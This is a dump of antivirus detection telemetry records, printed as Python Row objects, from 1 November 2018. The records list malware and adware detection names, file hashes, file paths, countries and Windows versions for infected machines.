  Row(detection=Row(filename='avscan-20181101-081046-904a2571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-081046-904A2571', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141121-ea118abd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141121-EA118ABD', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080956-8b0c26df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080956-8B0C26DF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080814-805ff83f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080814-805FF83F', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:08:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210424-4ab4b45d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210424-4AB4B45D', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210439-4c63d6f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210439-4C63D6F2', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210447-4d3e62d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210447-4D3E62D6', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210421-4a55da46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210421-4A55DA46', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210434-4bc4c824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210434-4BC4C824', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141344-f86ac225', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141344-F86AC225', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210428-4b1b0170', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210428-4B1B0170', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='G:\\Acrobat\\安装文件\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='9591fc48f13772e187d62420f7c8f05cb998785146d405ed8b1a9d9855c7531f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\95C45FA1EBFC6FB9AE18571480E6952E9ADCBA0A53BD164D8C3CFC1ACA6D460C', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\WASHIN SSS\\SSS2010\\WASHIN  APRIL2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='95cf86a9e1e52d79cc0f925bac2d86466933d3d53a76ece4a8e6d1b91d4d9190', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='menu .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\001\\menu\\menu .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9629aa09d30d97daf8a58f40a80366b17ce92c0d7d6bef5e444d6e249508baed', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='application.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Application.exe', filesize=832000, name='HEUR/AGEN.1028207.#M1.#R1'), hash='96344dbc8ec4db313207634d43a057e17a3a15700ce61540ca461499c3e7b006', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\CSI SAP2000 v18.1.1 Final  [x32 + x64] + Crack\\CSI SAP2000 v18.1.1 64bit\\install\\SAP2000v1811Setup64.exe', parentsize=471740928, timestamp='2018-11-01T20:56:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235715-91e78cb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9daa457\\AVSCAN-20181101-235652-8EA07104\\AVSCAN-20181101-235715-91E78CB2', filesize=832000, name='BDS/Bladabindi.832000.1.#M1.#R1'), hash='96344dbc8ec4db313207634d43a057e17a3a15700ce61540ca461499c3e7b006', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patcher.exe', filepath='\\?\\J:\\BlackShot\\Patcher.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9642af009fcaf97f3cc9e4d77296fd175dc41dddbd93ec3470577f90e2cc90db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:40:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\9653554C59F3A7A927926B6F783CDE4E7F90AFE22E988AB926B446D89384CE84', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9662d3f44fd833273ca8785992ca0b8e4b2fc625a6cf7a412bb5bfa184530498', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9662D3F44FD833273CA8785992CA0B8E4B2FC625A6CF7A412BB5BFA184530498', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9662d3f44fd833273ca8785992ca0b8e4b2fc625a6cf7a412bb5bfa184530498', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi1893.tmp', filepath='c:\\users\\X\\appdata\\local\\temp\\msi1893.tmp', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='97c8fe434d7f74bdf53f9de1e6c79f9ec2389681c27b98376ead536bbd603d48', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T01:46:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='h5_mapeditor.exe', filepath='H:\\Might And Magic V Hammers Of Fate\\bina1\\H5_MapEditor.exe', filesize=17408000, name='W32/Ramnit.CD.#M1.#R1'), hash='97cc1d47bbcafb61b42f27e4f2f49169a61cde004ab91f310afe6fbfeb863401', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:45:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213639-d6ab5d8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b284a54\\AVSCAN-20181101-211056-C9AF4117\\AVSCAN-20181101-213639-D6AB5D8B', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='97d074a4ad2d25720d9c88821148d958bb5e15d92e3bf8c810b98e47fc876b9d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213143-a301770b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b284a54\\AVSCAN-20181101-211056-C9AF4117\\AVSCAN-20181101-213143-A301770B', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='97d074a4ad2d25720d9c88821148d958bb5e15d92e3bf8c810b98e47fc876b9d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='97f88ad98ddb4cacd3085d3cf91562434c924331f99c9eeb8b11583603d7937e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\97F88AD98DDB4CACD3085D3CF91562434C924331F99C9EEB8B11583603D7937E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='97f88ad98ddb4cacd3085d3cf91562434c924331f99c9eeb8b11583603d7937e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161810-5f25a60a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a69a1854\\AVSCAN-20181101-160113-DD285349\\AVSCAN-20181101-161810-5F25A60A', filesize=392000, name='TR/Trash.Gen.#M1.#R1'), hash='98092b3494fbad6a979e6304edcfe5c69b76848c922436f25b209a63e6e43419', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:12:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T00:15:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_4_12_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_4_12_4.html', filesize=224000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='98f17d31323b54dd8415193a7a004693c35241c32ac38c9c36374d1b0de0e9bc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:41:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223531-7a8a5c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08bc9354\\AVSCAN-20181101-201130-5CBB0005\\AVSCAN-20181101-223531-7A8A5C3A', filesize=32952000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='991e00c0851258b4cb32d31e56939b31f31c4f1d4e7fd97a3315621bffaf1485', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubedownload.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\FreeYouTubeDownload.exe', filesize=32952000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='991e00c0851258b4cb32d31e56939b31f31c4f1d4e7fd97a3315621bffaf1485', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='99684bc2e499e7647453ae2adcf015c60014033ef8f54ad550b1b45ea2ffea80', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:48:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='99684bc2e499e7647453ae2adcf015c60014033ef8f54ad550b1b45ea2ffea80', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kexindll.dll', filepath='D:\\SVN_HK\\doc\\通道配置\\北京HX通道\\通道程序\\kexindll.dll', filesize=5376000, name='TR/Black.Gen2.#M300.#R100338'), hash='996de373c60de4b03c78b8968f2e7fb536ed116901aa54591ba971770a551e95', metadata=Row(cmdline='\\\\\\/command:update \\\\\\/pathfile:\\\\\\"C:\\\\\\\\Users\\\\\\\\cr\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\svnE3DF.tmp\\\\\\" \\\\\\/deletepathfile \\\\\\/hwnd:0000000000050A54', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\TortoiseSVN\\bin\\TortoiseProc.exe', parentsize=8142584, timestamp='2018-11-01T12:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183206-488da0be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183206-488DA0BE', filesize=64000, name='VBA/Dldr.Agent.lvmvi.#M1.#R1'), hash='998e65594b9d27fccc5c02c2346d317f870b8424f2836edf14ad0efd1d19e70a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rddjvja', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RDDJVJA', filesize=64000, name='VBA/Dldr.Agent.lvmvi.#M1.#R1'), hash='998e65594b9d27fccc5c02c2346d317f870b8424f2836edf14ad0efd1d19e70a', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmiadap.exe', filepath='C:\\Windows\\System32\\wbem\\WMIADAP.exe', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='999113aee6783853d56f3aa40bd524fc567df553aec310c797193704219930d7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:46:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\999577E42D9D2224FC8665043A6DC2A2AA7711221FE449CA1D3DB123709219B1', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\999577E42D9D2224FC8665043A6DC2A2AA7711221FE449CA1D3DB123709219B1', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:18:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winzip32.exe', filepath='G:\\WinZip\\WINZIP32.EXE', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='99c8dd7afc554a2073d581a035a554193b5fa1a101d4e8250f2981fb7cc95b52', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1822720, timestamp='2018-11-01T12:06:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='99c9493fe6e90f651a162ec76e7ecf597e67e69149267724432c7de9a60595a3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T15:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='99c9493fe6e90f651a162ec76e7ecf597e67e69149267724432c7de9a60595a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T15:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-180411-c24038be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3daed65c\\AVSCAN-20181031-174609-5DBCCF40\\AVSCAN-20181031-180411-C24038BE', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='99e71be7ddf4acc85e2152d498541a6257cad81fd966235e7f25d1140f9936ec', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escdll.dll', filepath='C:\\Windows\\System32\\escdll.dll', filesize=60000, name='W32/Ramnit.CD.#M1.#R1'), hash='99e743b7e7015210545d206355a3ea86583c4ea5c425112276661a5ddd87bf10', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\escsrv.exe', parentsize=94208, timestamp='2018-11-01T00:56:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escdll.dll', filepath='C:\\Windows\\System32\\escdll.dll', filesize=60000, name='W32/Ramnit.CD.#M1.#R1'), hash='99e743b7e7015210545d206355a3ea86583c4ea5c425112276661a5ddd87bf10', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\escsrv.exe', parentsize=94208, timestamp='2018-11-01T01:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152143-b8d031f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e694a98\\AVSCAN-20181101-152108-B361BDAE\\AVSCAN-20181101-152143-B8D031F3', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152156-baf4560e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e694a98\\AVSCAN-20181101-152108-B361BDAE\\AVSCAN-20181101-152156-BAF4560E', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f_01a656', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01a656', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T09:48:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regoffline.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Corel\\CorelDRAW Graphics Suite X4\\Languages\\EN\\Programs\\PCUUI\\regOffline.htm', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='9a221ab5802107c906f59f0d34b2cc0d7460cd4e7e60c5953e559d4bb6abd7aa', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pack200.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\pack200.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='9a5b0a4ee9155a581c307d5dbd0935c8ed26a1788aa21112ced161cb8a614be8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:47Z'), dt=datetime.date(2018, 11, 1)),
